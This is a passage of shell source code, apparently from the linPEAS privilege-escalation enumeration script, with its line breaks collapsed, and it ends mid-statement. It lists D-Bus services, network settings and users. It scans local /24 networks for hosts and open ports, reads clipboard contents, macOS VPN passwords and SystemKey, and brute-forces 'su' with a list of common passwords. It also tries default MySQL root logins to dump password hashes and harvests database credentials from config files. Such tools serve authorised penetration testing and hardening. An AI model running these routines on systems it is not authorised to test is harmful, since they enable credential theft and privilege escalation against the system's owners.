"s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E}
"s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #TODO:
identify allows in context="default" done done fi echo "" if ! [
"$SEARCH_IN_FOLDER" ]; then print_2title "D-Bus Service Objects list" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then busctl list | while
read line; do echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E}
"s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed
"s,root,${SED_RED},"; if ! echo "$line" | grep -qE "$dbuslistG"; then
srvc_object=$(echo $line | cut -d " " -f1) srvc_object_info=$(busctl status
"$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') if [
"$srvc_object_info" ]; then echo " -- $srvc_object_info" | sed
"s,UID=0,${SED_RED}," fi fi done else echo_not_found "busctl" fi fi fi echo ''
echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if
echo $CHECKS | grep -q network_information; then print_title "Network
Information" ########################################### #---------) Network
Information (---------# ########################################### if [
"$MACOS" ]; then print_2title "Network Capabilities" warn_exec system_profiler
SPNetworkDataType echo "" fi #-- NI) Hostname, hosts and DNS print_2title
"Hostname, hosts and DNS" cat /etc/hostname /etc/hosts /etc/resolv.conf
2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null warn_exec
dnsdomainname 2>/dev/null echo "" #-- NI) /etc/inetd.conf if [ "$EXTRA_CHECKS"
]; then print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" (cat
/etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev
"\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" fi #-- NI)
Interfaces print_2title "Interfaces" cat /etc/networks 2>/dev/null (ifconfig ||
ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6))
2>/dev/null echo "" #-- NI) Neighbours if [ "$EXTRA_CHECKS" ]; then print_2title
"Networks and neighbours" if [ "$MACOS" ]; then netstat -rn 2>/dev/null else
(route || ip n || cat /proc/net/route) 2>/dev/null fi (arp -e || arp -a || cat
/proc/net/arp) 2>/dev/null echo "" fi if [ "$MACPEAS" ]; then print_2title
"Firewall status" warn_exec system_profiler SPFirewallDataType fi #-- NI)
Iptables if [ "$EXTRA_CHECKS" ]; then print_2title "Iptables rules" (timeout 1
iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev
"\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" echo ""
fi #-- NI) Ports print_2title "Active Ports" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports" (
(netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null |
sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" echo "" #--
NI) MacOS hardware ports if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
print_2title "Hardware Ports" networksetup -listallhardwareports echo ""
print_2title "VLANs" networksetup -listVLANs echo "" print_2title "Wifi Info"
networksetup -getinfo Wi-Fi echo "" print_2title "Check Enabled Proxies" scutil
--proxy echo "" print_2title "Wifi Proxy URL" networksetup -getautoproxyurl
Wi-Fi echo "" print_2title "Wifi Web Proxy" networksetup -getwebproxy Wi-Fi echo
"" print_2title "Wifi FTP Proxy" networksetup -getftpproxy Wi-Fi echo "" fi #--
NI) tcpdump print_2title "Can I sniff with tcpdump?" timeout 1 tcpdump
>/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked
print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing" echo
"You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," else echo_no fi
echo "" #-- NI) Internet access if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] &&
[ -f "/bin/bash" ]; then print_2title "Internet Access?" check_tcp_80
2>/dev/null & check_tcp_443 2>/dev/null & check_icmp 2>/dev/null & check_dns
2>/dev/null & wait echo "" fi if [ "$AUTO_NETWORK_SCAN" ]; then if ! [
"$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then printf $RED"[-] $SCAN_BAN_BAD\n$NC"
echo "The network is not going to be scanned..." elif ! [ "$(command -v
ifconfig)" ] && ! [ "$(command -v ip a)" ]; then printf $RED"[-] No ifconfig or
ip commands, cannot find local ips\n$NC" echo "The network is not going to be
scanned..." else print_2title "Scanning local networks (using /24)" if ! [
"$PING" ] && ! [ "$FPING" ]; then printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" fi
select_nc local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo
'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' |
grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") printf "%s\n" "$local_ips" |
while read local_ip; do if ! [ -z "$local_ip" ]; then print_3title "Discovering
hosts in $local_ip/24" if [ "$PING" ] || [ "$FPING" ]; then discover_network
"$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network
Discovery" | grep -v "Network Discovery" | grep -Eo
'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp fi
discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' |
grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" |
grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips rm $Wfolder/.ips.tmp 2>/dev/null
while read disc_ip; do me="" if [ "$disc_ip" = "$local_ip" ]; then me=" (local)"
fi echo "Scanning top ports of ${disc_ip}${me}" (tcp_port_scan "$disc_ip" "" |
grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" |
sort | uniq) 2>/dev/null echo "" done < $Wfolder/.ips rm $Wfolder/.ips
2>/dev/null echo "" fi done print_3title "Scanning top ports of
host.docker.internal" (tcp_port_scan "host.docker.internal" "" | grep -A 1000
"Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq)
2>/dev/null echo "" fi fi if [ "$MACOS" ]; then print_2title "Any MacOS Sharing
Service Enabled?" rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep
"*.3283" | wc -l); scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' |
grep "*.5900" | wc -l); flShrng=$(netstat -na | grep LISTEN | grep -E
'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); rLgn=$(netstat -na | grep
LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); rAE=$(netstat -na | grep
LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); bmM=$(netstat -na | grep
LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); printf "\nThe following
services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing:
%s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac:
%s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; echo ""
print_2title "VPN Creds" system_profiler SPNetworkLocationDataType | grep -A 5
-B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," echo
"" if [ "$EXTRA_CHECKS" ]; then print_2title "Bluetooth Info" warn_exec
system_profiler SPBluetoothDataType echo "" print_2title "Ethernet Info"
warn_exec system_profiler SPEthernetDataType echo "" print_2title "USB Info"
warn_exec system_profiler SPUSBDataType echo "" fi fi fi echo '' echo '' if [
"$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS |
grep -q users_information; then print_title "Users Information"
########################################### #----------) Users Information
(----------# ########################################### #-- UI) My user
print_2title "My user" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users" (id ||
(whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed
-${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed
-${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" |
sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E}
"s,$idB,${SED_RED},g" echo "" if [ "$MACPEAS" ];then print_2title "Current user
Login and Logout hooks" defaults read
$HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e
"Hook" echo "" print_2title "All Login and Logout hooks" defaults read
/Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e
"Hook" defaults read
/private/var/root/Library/Preferences/com.apple.loginwindow.plist echo ""
print_2title "Keychains" print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
security list-keychains echo "" print_2title "SystemKey" ls -l /var/db/SystemKey
if [ -r "/var/db/SystemKey" ]; then echo "You can read /var/db/SystemKey" | sed
-${E} "s,.*,${SED_RED_YELLOW},"; hexdump -s 8 -n 24 -e '1/1 "%.2x"'
/var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi echo "" fi #-- UI)
PGP keys? print_2title "Do I have PGP keys?" command -v gpg 2>/dev/null ||
echo_not_found "gpg" gpg --list-keys 2>/dev/null command -v netpgpkeys
2>/dev/null || echo_not_found "netpgpkeys" netpgpkeys --list-keys 2>/dev/null
command -v netpgp 2>/dev/null || echo_not_found "netpgp" echo "" #-- UI)
Clipboard and highlighted text if [ "$(command -v xclip 2>/dev/null)" ] || [
"$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] ||
[ "$DEBUG" ]; then print_2title "Clipboard or highlighted text?" if [ "$(command
-v xclip 2>/dev/null)" ]; then echo "Clipboard: "$(xclip -o -selection clipboard
2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," echo "Highlighted
text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v xsel 2>/dev/null)" ]; then echo "Clipboard: "$(xsel -ob
2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," echo "Highlighted
text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v pbpaste 2>/dev/null)" ]; then echo "Clipboard: "$(pbpaste)
| sed -${E} "s,$pwd_inside_history,${SED_RED}," else echo_not_found "xsel and
xclip" fi echo "" fi #-- UI) Sudo -l print_2title "Checking 'sudo -l',
/etc/sudoers, and /etc/sudoers.d" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed
"s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed
-${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed
"s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ];
then (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" |
sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed
-${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g")
2>/dev/null || echo_not_found "sudo" fi ( grep -Iv "^$" cat /etc/sudoers | grep
-v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E}
"s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," |
sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" )
2>/dev/null || echo_not_found "/etc/sudoers" if ! [ "$IAMROOT" ] && [ -w
'/etc/sudoers.d/' ]; then echo "You can create a file in /etc/sudoers.d/ and
escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for filename in
/etc/sudoers.d/*; do if [ -r "$filename" ]; then echo "Sudoers file: $filename
is readable" | sed -${E} "s,.*,${SED_RED},g" grep -Iv "^$" "$filename" | grep -v
"#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E}
"s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," |
sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" fi done echo
"" #-- UI) Sudo tokens print_2title "Checking sudo tokens" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [
"$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is
disabled (0), so sudo tokens could be abused" | sed "s,is
disabled,${SED_RED},g"; if [ "$(command -v gdb 2>/dev/null)" ]; then echo "gdb
was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; fi if [
"$CURRENT_USER_PIVOT_PID" ]; then echo "The current user proc
$CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E}
"s,.*,${SED_RED},g"; fi if [ -f "$HOME/.sudo_as_admin_successful" ]; then echo
"Current user has .sudo_as_admin_successful file, so he can execute with sudo" |
sed -${E} "s,.*,${SED_RED},"; fi if ps -eo pid,command -u "$(id -u)" | grep -v
"$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
echo "Current user has other interactive shells running: " | sed -${E}
"s,.*,${SED_RED},g"; ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep
-v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' fi else echo "ptrace
protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; fi
echo "" #-- UI) Doas if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)"
2>/dev/null) if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf
$doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ];
then cat /etc/doas.conf "$doas_dir_name/doas.conf"
"$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null |
sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed
"s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
"s,$USER,${SED_RED_YELLOW}," else echo_not_found "doas.conf" fi echo "" fi #--
UI) Pkexec policy print_2title "Checking Pkexec policy" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev
"\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E}
"s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
-${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E}
"s,$Groups,${SED_RED_YELLOW},") || echo_not_found
"/etc/polkit-1/localauthority.conf.d" echo "" #-- UI) Superusers print_2title
"Superusers" awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed
"s,root,${SED_RED}," echo "" #-- UI) Users with console print_2title "Users with
console" if [ "$MACPEAS" ]; then dscl . list /Users | while read uname; do
ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) if grep -q
"$ushell" /etc/shells; then #Shell user dscl . -read "/Users/$uname" UserShell
RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed
"s,root,${SED_RED}," echo "" fi done else no_shells=$(grep -Ev "sh$" /etc/passwd
2>/dev/null | cut -d ':' -f 7 | sort | uniq) unexpected_shells="" printf "%s\n"
"$no_shells" | while read f; do if $f -c 'whoami' 2>/dev/null | grep -q "$USER";
then unexpected_shells="$f\n$unexpected_shells" fi done grep "sh$" /etc/passwd
2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed
"s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," if [
"$unexpected_shells" ]; then printf "%s" "These unexpected binaries are acting
like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" echo
"Unexpected users with shells:" printf "%s\n" "$unexpected_shells" | while read
f; do if [ "$f" ]; then grep -E "${f}$" /etc/passwd | sed -${E}
"s,/.*,${SED_RED},g" fi done fi fi echo "" #-- UI) All users & groups
print_2title "All users & groups" if [ "$MACPEAS" ]; then dscl . list /Users |
while read i; do id $i;done 2>/dev/null | sort | sed -${E}
"s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed
-${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" |
sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" else cut -d":"
-f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort |
sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed
-${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" |
sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g"
| sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" fi echo ""
#-- UI) Login now print_2title "Login now" (w || who || finger || users)
2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E}
"s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed
"s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," echo "" #-- UI) Last
logons print_2title "Last logons" (last -Faiw || last) 2>/dev/null | tail | sed
-${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," |
sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," |
sed "s,root,${SED_RED}," echo "" #-- UI) Login info print_2title "Last time
logon each user" lastlog 2>/dev/null | grep -v "Never" | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed
"s,root,${SED_RED}," EXISTS_FINGER="$(command -v finger 2>/dev/null)" if [
"$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then dscl . list /Users | while read
uname; do ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) if
grep -q "$ushell" /etc/shells; then #Shell user finger "$uname" | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed
"s,root,${SED_RED}," echo "" fi done fi echo "" #-- UI) Password policy if [
"$EXTRA_CHECKS" ]; then print_2title "Password policy" grep
"^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD"
/etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" if [
"$MACPEAS" ]; then print_2title "Relevant last user info and user configs"
defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null echo
"" print_2title "Guest user status" sysadminctl -afpGuestAccess status | sed
-${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," sysadminctl
-guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E}
"s,disabled,${SED_GREEN}," sysadminctl -smbGuestAccess status | sed -${E}
"s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" fi fi #--
UI) Brute su if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [
"$IAMROOT" ]; then print_2title "Testing 'su' as other users with shell using as
passwords: null pwd, the username and top2000pwds\n"$NC
POSSIBE_SU_BRUTE=$(check_if_su_brute); if [ "$POSSIBE_SU_BRUTE" ]; then
SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
printf "%s\n" "$SHELLUSERS" | while read u; do echo " Bruteforcing user $u..."
su_brute_user_num "$u" $PASSTRY done else printf $GREEN"It's not possible to
brute-force su.\n\n"$NC fi else print_2title "Do not forget to test 'su' as any
other user with shell: without password and with their names as password (I
don't do it in FAST mode...)\n"$NC fi print_2title "Do not forget to execute
'sudo -l' without password or with valid password (if you know it)!!\n"$NC fi
echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd";
fi if echo $CHECKS | grep -q software_information; then print_title "Software
Information" ########################################### #--------) Software
Information (---------# ###########################################
NGINX_KNOWN_MODULES="ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so"
#-- SI) Useful software if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Useful
software" for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done echo "" fi
#-- SI) Search for compilers if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title
"Installed Compilers" (dpkg --list 2>/dev/null | grep "compiler" | grep -v
"decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep
gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$"
2>/dev/null | grep -v "/doc/"); echo "" if [ "$(command -v pkg 2>/dev/null)" ];
then print_2title "Vulnerable Packages" pkg audit -F | sed -${E}
"s,vulnerable,${SED_RED},g" echo "" fi if [ "$(command -v brew 2>/dev/null)" ];
then print_2title "Brew Installed Packages" brew list echo "" fi fi if [
"$MACPEAS" ]; then print_2title "Writable Installed Applications"
system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 |
cut -c2- | while read f; do if [ -w "$f" ]; then echo "$f is writable" | sed
-${E} "s,.*,${SED_RED},g" fi done system_profiler SPFrameworksDataType | grep
"Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do if [ -w "$f" ]; then
echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi done fi #-- SI) MySQL
version if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [
"$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null ||
echo_not_found "mysql" mysqluser=$(systemctl status mysql 2>/dev/null | grep -o
".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1) if [ "$mysqluser" ];
then echo "MySQL user: $mysqluser" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," |
sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," |
sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," fi echo "" echo
"" #-- SI) MySQL connection root/root print_list "MySQL connection using default
root/root ........... " mysqlconnect=$(mysqladmin -uroot -proot version
2>/dev/null) if [ "$mysqlconnect" ]; then echo "Yes" | sed -${E}
"s,.*,${SED_RED}," mysql -u root --password=root -e "SELECT
User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E}
"s,.*,${SED_RED}," else echo_no fi #-- SI) MySQL connection root/toor print_list
"MySQL connection using root/toor ................... "
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) if [
"$mysqlconnect" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," mysql -u root
--password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;"
2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) MySQL
connection root/NOPASS mysqlconnectnopass=$(mysqladmin -uroot version
2>/dev/null) print_list "MySQL connection using root/NOPASS ................. "
if [ "$mysqlconnectnopass" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;"
2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" fi #-- SI)
MySQL credentials if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title
"Searching mysql credentials and exec" printf "%s\n" "$PSTORAGE_MYSQL" | while
read d; do if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only
interested in "mysql" that are folders (filesaren't the ones with creds)
STRINGS="`command -v strings`" echo "Potential file containing credentials:" ls
-l "$d" if [ "$STRINGS" ]; then strings "$d" else echo "Strings not found, cat
the file and check it to get the creds" fi else for f in $(find $d -name
debian.cnf 2>/dev/null); do if [ -r "$f" ]; then echo "We can read the mysql
debian.cnf. You can use this username/password to log in MySQL" | sed -${E}
"s,.*,${SED_RED}," cat "$f" fi done for f in $(find $d -name user.MYD
2>/dev/null); do if [ -r "$f" ]; then echo "We can read the Mysql Hashes from
$f" | sed -${E} "s,.*,${SED_RED}," grep -oaE "[-_\.\*a-Z0-9]{3,}" "$f" | grep -v
"mysql_native_password" fi done for f in $(grep -lr "user\s*=" $d 2>/dev/null |
grep -v "debian.cnf"); do if [ -r "$f" ]; then u=$(cat "$f" | grep -v "#" | grep
"user" | grep "=" 2>/dev/null) echo "From '$f' Mysql user: $u" | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed
"s,root,${SED_RED}," fi done for f in $(find $d -name my.cnf 2>/dev/null); do if
[ -r "$f" ]; then echo "Found readable $f" grep -v "^#" "$f" | grep -Ev
"\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," fi done
fi mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev
'^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ];
then echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)" echo "If you can
login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed
-${E} "s,.*,${SED_RED}," fi done fi echo "" if [ "$PSTORAGE_MARIADB" ] || [
"$DEBUG" ]; then print_2title "Analyzing MariaDB Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" |
grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev
"^#" | sed -${E}
"s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s"
"$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | grep -E
"user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*" |
sed -${E}
"s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then
print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec
psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E
\"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db";
fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while
